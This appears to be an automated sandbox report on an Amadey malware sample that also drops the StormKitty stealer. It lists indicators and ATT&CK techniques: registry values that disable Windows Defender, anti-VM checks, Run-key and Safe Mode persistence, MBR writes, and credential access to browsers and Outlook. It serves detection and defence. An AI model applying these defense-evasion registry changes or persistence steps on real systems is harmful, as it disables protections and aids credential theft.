amadey | a6334a19d5f77be548a00862a4c9b5f0863575a2cd42e3a43aae2a8ab4280f55

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	53e64105fd.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	53e64105fd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	53e64105fd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	53e64105fd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	53e64105fd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	53e64105fd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	53e64105fd.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	53e64105fd.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	53e64105fd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	53e64105fd.exe

Modifies security service 2 TTPs 2 IoCs

Modify Registry

Windows Service

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00080000000242b0-100.dat	family_stormkitty
behavioral1/memory/3736-113-0x00000000002C0000-0x00000000002FC000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	53e64105fd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ac5082e7c9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2c8d23ef22.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	5200	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5200	powershell.exe
4228	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 15 IoCs

flow	pid	Process
253	4052	rapes.exe
293	4052	rapes.exe
293	4052	rapes.exe
6	5200	powershell.exe
32	4052	rapes.exe
32	4052	rapes.exe
32	4052	rapes.exe
32	4052	rapes.exe
32	4052	rapes.exe
32	4052	rapes.exe
32	4052	rapes.exe
32	4052	rapes.exe
32	4052	rapes.exe
32	4052	rapes.exe
180	4376	svchost.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\4e6f50f4.sys	5a11d930.exe
File created	C:\Windows\System32\Drivers\klupd_4e6f50f4a_arkmon.sys	5a11d930.exe
File created	C:\Windows\System32\Drivers\klupd_4e6f50f4a_klbg.sys	5a11d930.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
5796	icacls.exe
1716	takeown.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4e6f50f4\ImagePath = "System32\\Drivers\\4e6f50f4.sys"	5a11d930.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_arkmon\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_arkmon.sys"	5a11d930.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_klbg\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_klbg.sys"	5a11d930.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_klark\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_klark.sys"	5a11d930.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_mark\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_mark.sys"	5a11d930.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_4e6f50f4a_arkmon.sys"	5a11d930.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ddb314f467.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	53e64105fd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2c8d23ef22.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ddb314f467.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	53e64105fd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ac5082e7c9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ac5082e7c9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2c8d23ef22.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe

Deletes itself 1 IoCs

pid	Process
2732	w32tm.exe

Executes dropped EXE 26 IoCs

pid	Process
3068	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE
4052	rapes.exe
4428	apple.exe
1000	261.exe
2368	261.exe
5352	3sZiUQa.exe
3736	KXtPusH.exe
448	2c8d23ef22.exe
4660	rapes.exe
3204	ddb314f467.exe
5300	cab1283345.exe
4704	53e64105fd.exe
4672	f5cd7caa1f.exe
2220	176117a9a6.exe
5996	Rm3cVPI.exe
3228	UZPt0hR.exe
1620	qWR3lUj.exe
5300	tzutil.exe
2732	w32tm.exe
5072	rapes.exe
2356	ac5082e7c9.exe
6488	7IIl2eE.exe
6436	5969479a.exe
7864	5a11d930.exe
8784	h8NlU62.exe
10944	Passwords.com

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	2c8d23ef22.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	53e64105fd.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	ac5082e7c9.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\4e6f50f4.sys	5a11d930.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\4e6f50f4.sys\ = "Driver"	5a11d930.exe

Loads dropped DLL 26 IoCs

pid	Process
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe

Modifies file permissions 1 TTPs 2 IoCs

File and Directory Permissions Modification

T1222

pid	Process
1716	takeown.exe
5796	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	53e64105fd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	53e64105fd.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	KXtPusH.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	KXtPusH.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	KXtPusH.exe

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cab1283345.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419570101\\cab1283345.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\53e64105fd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419580101\\53e64105fd.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\17c00725-0351-4b58-b404-eed076931aba = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{1ecfb85f-c304-4da8-be54-74c3b8a8fa08}\\17c00725-0351-4b58-b404-eed076931aba.cmd\""	5a11d930.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2c8d23ef22.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419550101\\2c8d23ef22.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ddb314f467.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419560101\\ddb314f467.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
49	ipinfo.io
50	ipinfo.io
342	ipinfo.io
343	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	5a11d930.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00080000000242da-197.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
10000	tasklist.exe
10320	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
3068	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE
4052	rapes.exe
448	2c8d23ef22.exe
4660	rapes.exe
4704	53e64105fd.exe
5072	rapes.exe
2356	ac5082e7c9.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4672 set thread context of 4060	4672	f5cd7caa1f.exe	224
PID 1620 set thread context of 1200	1620	qWR3lUj.exe	238
PID 8784 set thread context of 8808	8784	h8NlU62.exe	258

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	5969479a.exe
File opened (read-only)	\??\VBoxMiniRdrDN	5a11d930.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3156	sc.exe
4080	sc.exe
2780	sc.exe
1956	sc.exe
1292	sc.exe
5328	sc.exe
1356	sc.exe
2272	sc.exe
2200	sc.exe
5492	sc.exe
4088	sc.exe
2260	sc.exe
5652	sc.exe
2592	sc.exe
5692	sc.exe
5360	sc.exe
4928	sc.exe
3284	sc.exe
1740	sc.exe
4424	sc.exe
448	sc.exe
3580	sc.exe
5948	sc.exe
2884	sc.exe
5804	sc.exe
5512	sc.exe
4892	sc.exe
1840	sc.exe
2960	sc.exe
856	sc.exe
1272	sc.exe
5864	sc.exe
2384	sc.exe
6064	sc.exe
3400	sc.exe
3008	sc.exe
2744	sc.exe
4820	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
580	3736	WerFault.exe	178
8360	7392	WerFault.exe	372

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cab1283345.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	cab1283345.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ac5082e7c9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	176117a9a6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	cab1283345.exe
